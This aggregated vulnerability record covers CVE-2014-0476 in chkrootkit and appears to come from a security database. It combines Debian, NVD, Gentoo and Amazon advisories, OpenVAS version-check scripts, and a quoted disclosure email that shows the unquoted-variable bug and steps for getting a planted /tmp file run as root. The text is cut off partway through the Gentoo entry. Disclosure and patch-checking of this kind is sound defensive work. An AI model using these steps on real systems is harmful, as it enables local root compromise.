ID DEBIAN:3730DC3DDEE665F4BC46FDFA5C12DE34:559F0 Type debian Reporter Debian Modified 2014-06-04T10:42:00
Description
Package : chkrootkit
Version : 0.49-4+deb6u1
CVE ID : CVE-2014-0476
Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit
detector, which may allow local attackers to gain root access when /tmp
is mounted without the noexec option.
{"cve": [{"lastseen": "2020-12-09T19:58:20", "description": "The slapper function in chkrootkit before 0.50 does not properly quote file paths, which allows local users to execute arbitrary code via a Trojan horse executable. NOTE: this is only a vulnerability when /tmp is not mounted with the noexec option.", "edition": 5, "cvss3": {}, "published": "2014-10-25T22:55:00", "title": "CVE-2014-0476", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.7, "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0476"], "modified": "2017-09-19T01:36:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:13.10", "cpe:/o:canonical:ubuntu_linux:10.04", "cpe:/a:chkrootkit:chkrootkit:0.49", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2014-0476", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0476", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:lts:*:*:*:*:*", "cpe:2.3:a:chkrootkit:chkrootkit:0.49:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:lts:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "bulletinFamily": "software", "cvelist": ["CVE-2014-0476"], "description": "\r\n\r\n\r\nHi,\r\n\r\nThomas Stangner reported the following chkrootkit vulnerability.\r\n\r\nWe assigned CVE-2014-0476\r\n\r\nCheers,\r\nGiuseppe\r\n\r\n-------- Original Message --------\r\nSubject: Serious chkrootkit vulnerability\r\nDate: Sun, 25 May 2014 00:53:00 +0200\r\nFrom: Thomas Stangner <thomas.stangner@hetzner.de>\r\nOrganization: Hetzner Online AG\r\nTo: team@security.debian.org\r\n\r\nHi,\r\n\r\nwe just found a serious vulnerability in the chkrootkit package, which\r\nmay allow local attackers to gain root access to a box in certain\r\nconfigurations (/tmp not mounted noexec).\r\n\r\nThe vulnerability is located in the function slapper() in the\r\nshellscript chkrootkit:\r\n\r\n#\r\n# SLAPPER.{A,B,C,D} and the multi-platform variant\r\n#\r\nslapper (){\r\n SLAPPER_FILES="${ROOTDIR}tmp/.bugtraq ${ROOTDIR}tmp/.bugtraq.c"\r\n SLAPPER_FILES="$SLAPPER_FILES ${ROOTDIR}tmp/.unlock ${ROOTDIR}tmp/httpd \\r\n ${ROOTDIR}tmp/update ${ROOTDIR}tmp/.cinik ${ROOTDIR}tmp/.b"a\r\n SLAPPER_PORT="0.0:2002 |0.0:4156 |0.0:1978 |0.0:1812 |0.0:2015 "\r\n OPT=-an\r\n STATUS=0\r\n file_port=\r\n\r\n if ${netstat} "${OPT}"|${egrep} "^tcp"|${egrep} "${SLAPPER_PORT}">\r\n/dev/null 2>&1\r\n then\r\n STATUS=1\r\n [ "$SYSTEM" = "Linux" ] && file_port=`netstat -p ${OPT} | \\r\n $egrep ^tcp|$egrep "${SLAPPER_PORT}" | ${awk} '{ print $7 }' |\r\ntr -d :`\r\n fi\r\n for i in ${SLAPPER_FILES}; do\r\n if [ -f ${i} ]; then\r\n file_port=$file_port $i\r\n STATUS=1\r\n fi\r\n done\r\n if [ ${STATUS} -eq 1 ] ;then\r\n echo "Warning: Possible Slapper Worm installed ($file_port)"\r\n else\r\n if [ "${QUIET}" != "t" ]; then echo "not infected"; fi\r\n return ${NOT_INFECTED}\r\n fi\r\n}\r\n\r\n\r\nThe line 'file_port=$file_port $i' will execute all files specified in\r\n$SLAPPER_FILES as the user chkrootkit is running (usually root), if\r\n$file_port is empty, because of missing quotation marks around the\r\nvariable assignment.\r\n\r\nSteps to reproduce:\r\n\r\n- Put an executable file named 'update' with non-root owner in /tmp (not\r\nmounted noexec, obviously)\r\n- Run chkrootkit (as uid 0)\r\n\r\nResult: The file /tmp/update will be executed as root, thus effectively\r\nrooting your box, if malicious content is placed inside the file.\r\n\r\nIf an attacker knows you are periodically running chkrootkit (like in\r\ncron.daily) and has write access to /tmp (not mounted noexec), he may\r\neasily take advantage of this.\r\n\r\n\r\nSuggested fix: Put quotation marks around the assignment.\r\n\r\nfile_port="$file_port $i"\r\n\r\n\r\nI will also try to contact upstream, although the latest version of\r\nchkrootkit dates back to 2009 - will have to see, if I reach a dev there.\r\n\r\n\r\nKeep up the good work,\r\n\r\nCheers,\r\nThomas\r\n\r\n\r\n\r\n", "edition": 1, "modified": "2014-06-09T00:00:00", "published": "2014-06-09T00:00:00", "id": "SECURITYVULNS:DOC:30791", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30791", "title": "[oss-security] CVE-2014-0476 chkrootkit vulnerability", "type": "securityvulns", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2014-0476"], "description": "It's possible to execute file from /tmp", "edition": 1, "modified": "2014-06-09T00:00:00", "published": "2014-06-09T00:00:00", "id": "SECURITYVULNS:VULN:13815", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13815", "title": "chkrootkit privilege escalation", "type": "securityvulns", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-25T10:48:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "description": "Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit\ndetector, which may allow local attackers to gain root access when /tmp\nis mounted without the noexec option.", "modified": "2017-07-10T00:00:00", "published": "2014-06-03T00:00:00", "id": "OPENVAS:702945", "href": "http://plugins.openvas.org/nasl.php?oid=702945", "type": "openvas", "title": "Debian Security Advisory DSA 2945-1 (chkrootkit - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2945.nasl 6637 2017-07-10 09:58:13Z teissa $\n# Auto-generated from advisory DSA 2945-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"chkrootkit on Debian Linux\";\ntag_insight = \"The chkrootkit security scanner searches the local system for signs\nthat it is infected with a 'rootkit'. Rootkits are set of programs\nand hacks designed to take control of a target machine by using known\nsecurity flaws.\";\ntag_solution = \"For the stable distribution (wheezy), this problem has been fixed in\nversion 0.49-4.1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.49-5.\n\nWe recommend that you upgrade your chkrootkit packages.\";\ntag_summary = \"Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit\ndetector, which may allow local attackers to gain root access when /tmp\nis mounted without the noexec option.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702945);\n script_version(\"$Revision: 6637 $\");\n script_cve_id(\"CVE-2014-0476\");\n script_name(\"Debian Security Advisory DSA 2945-1 (chkrootkit - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-10 11:58:13 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-06-03 00:00:00 +0200 (Tue, 03 Jun 2014)\");\n script_tag(name:\"cvss_base\", value:\"3.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2945.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"chkrootkit\", ver:\"0.49-4.1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chkrootkit\", ver:\"0.49-4.1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chkrootkit\", ver:\"0.49-4.1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"chkrootkit\", ver:\"0.49-4.1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 3.7, "vector": "AV:LOCAL/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-17T23:00:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120579", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120579", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-370)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120579\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:29:59 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-370)\");\n script_tag(name:\"insight\", value:\"A quoting issue was found in chkrootkit which would lead to a file in /tmp/ being executed, if /tmp/ was mounted without the noexec option. chkrootkit is typically run as the root user. A local attacker could use this flaw to escalate their privileges.\");\n script_tag(name:\"solution\", value:\"Run yum update chkrootkit to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-370.html\");\n script_cve_id(\"CVE-2014-0476\");\n script_tag(name:\"cvss_base\", value:\"3.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"chkrootkit-debuginfo\", rpm:\"chkrootkit-debuginfo~0.49~9.8.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"chkrootkit\", rpm:\"chkrootkit~0.49~9.8.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2014-06-09T00:00:00", "id": "OPENVAS:1361412562310841851", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841851", "type": "openvas", "title": "Ubuntu Update for chkrootkit USN-2230-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_2230_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for chkrootkit USN-2230-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841851\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-09 15:19:24 +0530 (Mon, 09 Jun 2014)\");\n script_cve_id(\"CVE-2014-0476\");\n script_tag(name:\"cvss_base\", value:\"3.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Ubuntu Update for chkrootkit USN-2230-1\");\n\n script_tag(name:\"affected\", value:\"chkrootkit on Ubuntu 14.04 LTS,\n Ubuntu 13.10,\n Ubuntu 12.04 LTS,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"insight\", value:\"Thomas Stangner discovered that chkrootkit incorrectly quoted\ncertain values. A local attacker could use this issue to execute arbitrary code\nwhen chkrootkit is run and gain root privileges.\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"2230-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2230-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chkrootkit'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|12\\.04 LTS|10\\.04 LTS|13\\.10)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"chkrootkit\", ver:\"0.49-4.1ubuntu1.14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"chkrootkit\", ver:\"0.49-4ubuntu1.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"chkrootkit\", ver:\"0.49-3ubuntu0.1\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU13.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"chkrootkit\", ver:\"0.49-4.1ubuntu1.13.10.1\", rls:\"UBUNTU13.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-06-17T00:00:00", "id": "OPENVAS:1361412562310867866", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867866", "type": "openvas", "title": "Fedora Update for chkrootkit FEDORA-2014-7071", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for chkrootkit FEDORA-2014-7071\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867866\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-17 09:54:03 +0530 (Tue, 17 Jun 2014)\");\n script_cve_id(\"CVE-2014-0476\");\n script_tag(name:\"cvss_base\", value:\"3.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for chkrootkit FEDORA-2014-7071\");\n script_tag(name:\"affected\", value:\"chkrootkit on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7071\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134326.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chkrootkit'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"chkrootkit\", rpm:\"chkrootkit~0.49~9.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:45", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "description": "Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit\ndetector, which may allow local attackers to gain root access when /tmp\nis mounted without the noexec option.", "modified": "2019-03-19T00:00:00", "published": "2014-06-03T00:00:00", "id": "OPENVAS:1361412562310702945", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702945", "type": "openvas", "title": "Debian Security Advisory DSA 2945-1 (chkrootkit - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2945.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 2945-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702945\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-0476\");\n script_name(\"Debian Security Advisory DSA 2945-1 (chkrootkit - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-03 00:00:00 +0200 (Tue, 03 Jun 2014)\");\n script_tag(name:\"cvss_base\", value:\"3.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-2945.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"chkrootkit on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), this problem has been fixed in\nversion 0.49-4.1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 0.49-5.\n\nWe recommend that you upgrade your chkrootkit packages.\");\n script_tag(name:\"summary\", value:\"Thomas Stangner discovered a vulnerability in chkrootkit, a rootkit\ndetector, which may allow local attackers to gain root access when /tmp\nis mounted without the noexec option.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"chkrootkit\", ver:\"0.49-4.1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0476"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-06-17T00:00:00", "id": "OPENVAS:1361412562310867899", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310867899", "type": "openvas", "title": "Fedora Update for chkrootkit FEDORA-2014-7090", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for chkrootkit FEDORA-2014-7090\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.867899\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-06-17 10:02:17 +0530 (Tue, 17 Jun 2014)\");\n script_cve_id(\"CVE-2014-0476\");\n script_tag(name:\"cvss_base\", value:\"3.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:H/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for chkrootkit FEDORA-2014-7090\");\n script_tag(name:\"affected\", value:\"chkrootkit on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-7090\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-June/134341.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'chkrootkit'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"chkrootkit\", rpm:\"chkrootkit~0.49~9.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 3.7, "vector": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2017-09-17T20:44:52", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0476"], "description": "### Background\n\nchkrootkit is a tool to locally check for signs of a rootkit.\n\n### Description\n\nWhen /tmp is mounted without the noexec option chkrootkit will execute files in /tmp with root privileges. \n\n### Impact\n\nA local attacker could possibly execute arbitrary code with root privileges. \n\n### Workaround\n\nUsers should mount /tmp with noexec option.\n\n### Resolution\n\nAll chkrootkit users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=app-forensics/chkrootkit-0.50\"", "edition": 1, "modified": "2017-09-17T00:00:00", "published": "2017-09-17T00:00:00", "href": "https://security.gentoo.org/glsa/201709-05", "id": "GLSA-201709-05", "title": 